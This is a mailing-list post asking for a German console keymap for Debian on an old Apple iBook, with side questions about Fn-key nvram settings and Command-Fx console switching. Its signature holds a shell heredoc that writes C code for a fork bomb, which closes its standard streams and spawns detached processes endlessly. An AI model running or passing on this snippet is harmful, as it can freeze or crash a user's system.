german keymap for old ibook

Hi!

I'm using debian unstable on an old Apple iBook computer (it's an
iBook tangerine from the first series of iBooks) and am looking for a
working german keymap. I do not use X, I need a keymap for the
console. Does anyone here have a clue of where to get this? All the
ones I've found are either not working or have some keys missing,
which are crucial to me, like ~, |, \ and so on. It'd be nice if the
keymap was largely the same as Mac OS 9.2.1 has (although this
keymapping is quite stupid, it has @ on Alt-l, and ~ is a deadkey
produced with Alt-n and then space).

I'm currently running a linux 2.4.15-pre6-ben0 kernel without
ADBRAWCODES.

Another problem I'd also like to solve, is that the kernel does not
regard the settings concerning the Fn-Key, which I think are stored in
the nvram, as booting linux always also changes this setting in Mac
OS.

Also, console-switching does not work using Command-Fx, even
Command-Fn-Fx does not work, it only works with ADB raw keycodes, but
the console-tools package says, I should not use ADB rawcodes.

I'd strongly appreciate any help from this list, as it would save me a
lot of work creating my own keymap and figuring all that stuff out, I
guess there must be some other users having the same problems here.

TIA

packet

PS: Please don't Cc me on replies, I'm reading this list.

--
d=`which diet`;s='strip -R .comment';cat >b.c<<'(C) 2001 by packet'
main(){close(0);close(1);close(2);while(1){if((!fork())){setsid();}}}